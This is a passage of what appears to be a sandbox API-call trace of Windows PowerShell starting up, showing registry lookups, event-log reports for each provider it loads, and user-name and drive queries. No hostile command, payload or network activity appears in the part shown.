	[0055.732] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x394) returned 0x0
	[0055.732] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x2
	[0055.732] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x398) returned 0x0
	[0055.733] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x2
	[0055.733] RegOpenKeyExW (in: hKey=0x388, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x39c) returned 0x0
	[0055.733] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x2
	[0055.733] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x5
	[0055.735] RegOpenKeyExW (in: hKey=0x388, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x3a0) returned 0x0
	[0055.735] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x0) returned 0x2
	[0055.735] RegOpenKeyExW (in: hKey=0x388, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x3a4) returned 0x0
	[0055.735] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e290 | out: phkResult=0x22e290*=0x3a8) returned 0x0
	[0055.735] RegCloseKey (hKey=0x3a8) returned 0x0
	[0055.735] RegCloseKey (hKey=0x388) returned 0x0
	[0055.735] RegCloseKey (hKey=0x3a4) returned 0x0
	[0055.737] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x4890004
	[0055.829] GetLastError () returned 0x0
	[0055.831] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x243d494*="WSMan", lpRawData=0x243d33c) returned 1
	[0055.832] GetLastError () returned 0x0
	[0055.833] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.833] GetLastError () returned 0xcb
	[0055.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.833] GetLastError () returned 0xcb
	[0055.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.834] GetLastError () returned 0xcb
	[0055.834] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.834] GetLastError () returned 0xcb
	[0055.834] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0055.834] GetLastError () returned 0xcb
	[0055.834] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0055.835] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2441338*="Alias", lpRawData=0x24411f4) returned 1
	[0055.836] GetLastError () returned 0x0
	[0055.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.837] GetLastError () returned 0xcb
	[0055.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.838] GetLastError () returned 0xcb
	[0055.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.838] GetLastError () returned 0xcb
	[0055.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.838] GetLastError () returned 0xcb
	[0055.838] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0055.838] GetLastError () returned 0xcb
	[0055.838] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0055.839] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2445294*="Environment", lpRawData=0x2445150) returned 1
	[0055.839] GetLastError () returned 0x0
	[0055.840] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.840] GetLastError () returned 0xcb
	[0055.841] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0055.841] GetLastError () returned 0xcb
	[0055.841] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="\\Users\\2XC7u663GxWc") returned 0x13
	[0055.841] GetLastError () returned 0xcb
	[0055.841] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc", nBufferLength=0x105, lpBuffer=0x22df34, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc", lpFilePart=0x0) returned 0x15
	[0055.841] GetLastError () returned 0xcb
	[0055.841] SetErrorMode (uMode=0x1) returned 0x1
	[0055.841] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc" (normalized: "c:\\users\\2xc7u663gxwc"), fInfoLevelId=0x0, lpFileInformation=0x22e3b4 | out: lpFileInformation=0x22e3b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc16c9120, ftCreationTime.dwHighDateTime=0x1d348d5, ftLastAccessTime.dwLowDateTime=0xc1c966c0, ftLastAccessTime.dwHighDateTime=0x1d348d5, ftLastWriteTime.dwLowDateTime=0xc1c966c0, ftLastWriteTime.dwHighDateTime=0x1d348d5, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0055.842] GetLastError () returned 0xcb
	[0055.842] SetErrorMode (uMode=0x1) returned 0x1
	[0055.842] GetLogicalDrives () returned 0x4
	[0055.842] GetLastError () returned 0xcb
	[0055.843] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22de58, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.843] GetLastError () returned 0xcb
	[0055.844] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.844] GetLastError () returned 0xcb
	[0055.844] SetErrorMode (uMode=0x1) returned 0x1
	[0055.846] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3c3620, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x22e380, lpMaximumComponentLength=0x22e37c, lpFileSystemFlags=0x22e378, lpFileSystemNameBuffer=0x3c3520, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x22e380*=0x64285303, lpMaximumComponentLength=0x22e37c*=0xff, lpFileSystemFlags=0x22e378*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0055.846] GetLastError () returned 0xcb
	[0055.846] SetErrorMode (uMode=0x1) returned 0x1
	[0055.846] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.846] GetLastError () returned 0xcb
	[0055.846] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22dee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.846] GetLastError () returned 0xcb
	[0055.846] SetErrorMode (uMode=0x1) returned 0x1
	[0055.846] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x244649c | out: lpFileInformation=0x244649c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0055.847] GetLastError () returned 0xcb
	[0055.847] SetErrorMode (uMode=0x1) returned 0x1
	[0055.847] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22dee0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.847] GetLastError () returned 0xcb
	[0055.847] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22de6c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.847] GetLastError () returned 0xcb
	[0055.847] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.847] GetLastError () returned 0xcb
	[0055.848] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22de28, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.849] GetLastError () returned 0xcb
	[0055.849] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0055.849] GetLastError () returned 0xcb
	[0055.849] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22de30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.849] GetLastError () returned 0xcb
	[0055.849] SetErrorMode (uMode=0x1) returned 0x1
	[0055.850] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24470f4 | out: lpFileInformation=0x24470f4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0055.850] GetLastError () returned 0xcb
	[0055.850] SetErrorMode (uMode=0x1) returned 0x1
	[0055.850] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22de38, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.850] GetLastError () returned 0xcb
	[0055.850] SetErrorMode (uMode=0x1) returned 0x1
	[0055.850] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x2447244 | out: lpFileInformation=0x2447244*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0055.850] GetLastError () returned 0xcb
	[0055.850] SetErrorMode (uMode=0x1) returned 0x1
	[0055.850] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x22de7c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0055.850] GetLastError () returned 0xcb
	[0055.850] SetErrorMode (uMode=0x1) returned 0x1
	[0055.850] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x24473e4 | out: lpFileInformation=0x24473e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x630b8bd0, ftLastAccessTime.dwHighDateTime=0x1d46cf7, ftLastWriteTime.dwLowDateTime=0x630b8bd0, ftLastWriteTime.dwHighDateTime=0x1d46cf7, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0055.850] GetLastError () returned 0xcb
	[0055.850] SetErrorMode (uMode=0x1) returned 0x1
	[0055.850] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0055.851] GetLastError () returned 0xcb
	[0055.851] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0055.851] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x244a134*="FileSystem", lpRawData=0x2449ff0) returned 1
	[0055.851] GetLastError () returned 0x0
	[0055.852] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.852] GetLastError () returned 0xcb
	[0055.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.853] GetLastError () returned 0xcb
	[0055.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.853] GetLastError () returned 0xcb
	[0055.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.853] GetLastError () returned 0xcb
	[0055.853] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0055.854] GetLastError () returned 0xcb
	[0055.854] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0055.854] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x244e1ec*="Function", lpRawData=0x244e0a8) returned 1
	[0055.854] GetLastError () returned 0x0
	[0055.857] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.857] GetLastError () returned 0xcb
	[0055.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.862] GetLastError () returned 0xcb
	[0055.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.862] GetLastError () returned 0xcb
	[0055.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.862] GetLastError () returned 0xcb
	[0055.862] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.862] GetLastError () returned 0xcb
	[0055.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de18, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.935] GetLastError () returned 0xcb
	[0055.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.935] GetLastError () returned 0xcb
	[0055.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.936] GetLastError () returned 0xcb
	[0055.937] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0055.938] GetLastError () returned 0xcb
	[0055.938] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0055.938] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2467268*="Registry", lpRawData=0x2467124) returned 1
	[0055.961] GetLastError () returned 0x0
	[0055.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.962] GetLastError () returned 0x0
	[0055.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.962] GetLastError () returned 0x0
	[0055.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0055.962] GetLastError () returned 0x0
	[0055.962] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0055.963] GetLastError () returned 0x0
	[0055.963] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0055.963] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x246b018*="Variable", lpRawData=0x246aed4) returned 1
	[0055.963] GetLastError () returned 0x0
	[0055.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.965] GetLastError () returned 0xcb
	[0055.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0055.967] GetLastError () returned 0xcb
	[0055.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22de04, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0055.969] GetLastError () returned 0xcb
	[0055.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0055.969] GetLastError () returned 0xcb
	[0055.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0055.969] GetLastError () returned 0xcb
	[0055.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x22ddb4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0055.969] GetLastError () returned 0xcb
	[0056.062] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x3c3ce0, nSize=0x22e404 | out: lpNameBuffer="ZGW5TDPU\\2XC7u663GxWc", nSize=0x22e404) returned 0x1
	[0056.062] GetLastError () returned 0x3
	[0056.062] GetUserNameW (in: lpBuffer=0x3c3520, pcbBuffer=0x22e40c | out: lpBuffer="2XC7u663GxWc", pcbBuffer=0x22e40c) returned 1
	[0056.063] ReportEventW (hEventLog=0x4890004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2478da4*="Certificate", lpRawData=0x2478c60) returned 1
	[0056.078] GetLastError () returned 0x0
	[0056.107] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.107] GetLastError () returned 0xcb
	[0056.112] GetLogicalDrives () returned 0x4
	[0056.112] GetLastError () returned 0xcb
	[0056.113] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x22df7c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0056.113] GetLastError () returned 0xcb
	[0056.113] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0056.113] GetLastError () returned 0xcb
	[0056.114] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3c3520 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0056.114] GetLastError () returned 0xcb
	[0056.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.115] GetLastError () returned 0xcb
	[0056.115] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.115] GetLastError () returned 0xcb
	[0056.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.132] GetLastError () returned 0xcb
	[0056.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0056.134] GetLastError () returned 0xcb
